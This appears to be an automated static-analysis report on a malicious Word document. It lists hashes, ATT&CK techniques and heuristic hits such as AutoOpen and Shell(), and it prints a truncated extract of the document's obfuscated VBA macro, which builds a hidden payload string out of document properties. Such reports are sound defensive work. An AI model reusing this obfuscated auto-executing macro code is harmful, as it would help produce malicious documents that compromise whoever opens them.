Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 507de07a48431d32…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 86.0 KB
Created: 2017-10-16 13:31:00
Authoring application: Microsoft Office Word
First seen: 2017-10-28
MD5: 74693b5762563fa25626d8aaed59ce23
SHA-1: 8517d78b5a91b67afcf93da8aea61ad72d063483
SHA-256: 507de07a48431d321a48e6ff7e20034ad92962bc12fb5ccabf79c7b13f6ae4fc
Risk score: 242

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1203 Exploitation for Client Execution

The sample is a malicious Office document containing a VBA macro. The macro uses the Shell() function, indicating an attempt to execute arbitrary commands. This is further supported by the ClamAV detection and by heuristics flagging auto-execution and obfuscation. The specific payload or target of the Shell() command could not be determined because of the obfuscation.

Heuristics (7 findings)

  • ClamAV: Doc.Macro.Obfuscation-6355576-0 (severity: critical; tag: CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Macro.Obfuscation-6355576-0
  • VBA macros detected (severity: medium; 3 related findings; tag: OLE_VBA_MACROS)
    Document contains VBA macro code.
  • Shell() call in VBA (severity: critical; tag: OLE_VBA_SHELL)
    The VBA code calls Shell().
  • AutoOpen macro (severity: high; tag: OLE_VBA_AUTOOPEN)
    The VBA project contains an AutoOpen macro.
  • VBA p-code auto-exec with execution tokens (severity: high; tag: OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker (severity: medium; tag: OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL (severity: info; tag: EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (found in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 13506 bytes
SHA-256: c2b33eb83b7ea6c184774bc2fa383bbd7f486dc5a0c4a6ba1dbe90c352d36e2a
Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Module1"
Sub oZkwrXtbA()
ZBiqKsNS = "U9GLJSBMXVMQYSHMNZvpFjLpEwiAiMzkOzuCiRrRPXBjiZWEXOXAlwkwbhONBPG5TY2D81GG"
CYvVrLCCYo = Mid(ZBiqKsNS, 18, 42)
zjPCjikZXJ = CYvVrLCCYo
ovfWDE = "KV5GYP9BG2EEdWrwwzOpKSnSFwInULNBhlzJcKvWXOakKbWGFYjOTZuFvjlthzQwXqXrXhUm8ON9YQD2NUXSNF9GL"
zKjXzuzU = Mid(ovfWDE, 12, 61)
wwkjEdOOi = zKjXzuzU
DKjQnasEtvq = "G4EDDLSHWCQwWjPJziLfliarMKUfAmEjWQCtMtUALY88C3QGUJLYJG5AFA"
zJwlFCwpDWs = Mid(DKjQnasEtvq, 7, 32)
qjffMtaIzD = zJwlFCwpDWs
zvaLiwuZn = "LDPG4LY3RUXZPU6TQ60JJCCdndOV08FGGL"
hDASiqwpp = Mid(zvaLiwuZn, 22, 5)
YSMBVIiDdp = hDASiqwpp
qvwzsi = "ZRUQP85UH1UI9L526EW8LsYfiFzGiurvuImdQTpfIJHvrqKlzkKfJjzZDjhAzVmnJVOnYXRApbqFkdnruPDFRJKY"
uddbBhwOYzC = Mid(qvwzsi, 22, 60)
NciZb = uddbBhwOYzC
mIVWTN = "CCRKWUPXWHZV9C1phnWHXERBS9OVZM1"
CEIotnnzAd = Mid(mIVWTN, 16, 4)
waPQqwodB = CEIotnnzAd
tMpjujAZHz = "CTKL1GOVI5VA9BGucjRjDAWY"
RXipMiC = Mid(tMpjujAZHz, 14, 9)
XWumfEHE = RXipMiC
VcNJMnZ = "P31OJzjMmOIMahmGUV9SM3KXVUGYM9E5JXUGJ1TO73CE9"
JzXmi = Mid(VcNJMnZ, 4, 12)
jtdmP = JzXmi
MczpB = "6GQ11DXEM1G8LCsRwsDIdaBiviziIrtOvYCoawbMUEiiXEuMaIwNsYITfPUTYHOAiM3PADDCTMI69AKRJE"
NRqiwOfzMH = Mid(MczpB, 14, 52)
HVLdMCqjj = NRqiwOfzMH
POMiQivqW = "MP2QYTUAOHzzBzQujKFCQG8XDUG"
aIFUarIriOU = Mid(POMiQivqW, 8, 10)
kQkzhk = aIFUarIriOU
VObFKN = "F73BZRQXYTmGBOI"
UQTNCdwtR = Mid(VObFKN, 10, 2)
LjkwW = UQTNCdwtR
uwjGCYtZlqh = "RCFVHDcjRPGLDakjtXIZ2WZEUIOL8VC4L1ALRHRC1AM9VR7YQCEXD"
jIPoFVu = Mid(uwjGCYtZlqh, 4, 14)
AuzIIvGAZp = jIPoFVu
dKKVwz = "LL7MQVLVIZDVX2LWcXMaTKphquoZP"
bzHStzvdjzu = Mid(dKKVwz, 16, 12)
WJqKiS = bzHStzvdjzu
Dtirwws = "JhVnhLwFAZCLaWEFijvckipwHzFwwRfKQfORcOPFzbViBQIvLAhUfHwODTC9KND8LLO1EY"
VtlEmAcDozi = Mid(Dtirwws, 2, 55)
lbSBojbvwDR = VtlEmAcDozi
XwAScJ = "7SHpnctAcjwqnnLXiiZihcLfZdcPozwRPvbBS71XI7317X8P88L92PQY5R9"
NsoPVrIHYRN = Mid(XwAScJ, 4, 33)
hKZkDASNztf = NsoPVrIHYRN
JNhUCw = "SFQJTYNzDrwQroZvTKrknHAtfVXQiJKdInMpdDDfjMXRzzAkiXMFdilUQDWSHALIZFXB"
wRKvAU = Mid(JNhUCw, 5, 51)
bDFzKQ = wRKvAU
dzUcLiOFY = "" + ZbkJF + QEioI + LvIEIh + QThnjZl + hwwWA + fYwwuwa + nwDzY + zUAVHDGr + EjUHjIjS + cjWKI + jIIfjj + BrEMwdO + "com" + "ments" + ZbkJF + QEioI + LvIEIh + QThnjZl + hwwWA + fYwwuwa + nwDzY + zUAVHDGr + EjUHjIjS + cjWKI + jIIfjj + BrEMwdO + jnjJrLiT + fOlpwM + JrHYvzM + FUicC + TmUnzpa
pCICophJua = Left(Right((lMJwjVCjz(dzUcLiOFY)), Len((lMJwjVCjz(dzUcLiOFY))) - 8763), 83)
splWwzcUKuc = Left(Right((lMJwjVCjz(dzUcLiOFY)), Len((lMJwjVCjz(dzUcLiOFY))) - 3021), 73)
JrWhakihRR = Right(Left((lMJwjVCjz(dzUcLiOFY)), 1589), 31)
uzicajA = Right(Left((lMJwjVCjz(dzUcLiOFY)), 3992), 103)
rIdJajtD = Left(Right((lMJwjVCjz(dzUcLiOFY)), Len((lMJwjVCjz(dzUcLiOFY))) - 3807), 14)
aQOiwKbTqnS = Right(Left((lMJwjVCjz(dzUcLiOFY)), 8997), 54)
WDBzzrkK = Left(Right((lMJwjVCjz(dzUcLiOFY)), Len((lMJwjVCjz(dzUcLiOFY))) - 762), 106)
LSitXAB = Left(Right((lMJwjVCjz(dzUcLiOFY)), Len((lMJwjVCjz(dzUcLiOFY))) - 14562), 89)
lXoCfTjR = Mid((lMJwjVCjz(dzUcLiOFY)), 553, 63)
KkKQkGG = Left(Right((lMJwjVCjz(dzUcLiOFY)), Len((lMJwjVCjz(dzUcLiOFY))) - 4384), 36)
vMvjwzDMP = Right(Left((lMJwjVCjz(dzUcLiOFY)), 15025), 143)
Towop = Left(Right((lMJwjVCjz(dzUcLiOFY)), Len((lMJwjVCjz(dzUcLiOFY))) - 10063), 116)
AVjRZluRj = Right(Left((lMJwjVCjz(dzUcLiOFY)), 9950), 73)
wmRbR = Left(Right((lMJwjVCjz(dzUcLiOFY)), Len((lMJwjVCjz(dzUcLiOFY))) - 15163), 68)
poqFcGQ = Mid((lMJwjVCjz(dzUcLiOFY)), 12536, 109)
wVlVbkYFCCd = Left(Right((lMJwjVCjz(dzUcLiOFY)), Len((lMJwjVCjz(dzUcLiOFY))) - 10886), 38)
ojNCKQ = Left(Right((lMJwjVCjz(dzUcLiOFY)), Len((lMJwjVCjz(dzUcLiOFY))) - 2253), 51)
rXEXzLrvta = Left(Right((lMJwjVCjz(dzUcLiOFY)), Len((lMJwjVCjz(dzUcLiOFY))) - 8190), 55)
rzwzfaOO = Right(Left((lMJwjVCjz(dzUcLiOFY)), 12455), 29)
OPdfzJra = Mid((lMJwjVCjz(dzUcLiOFY)), 15351, 124)
VI
... (truncated)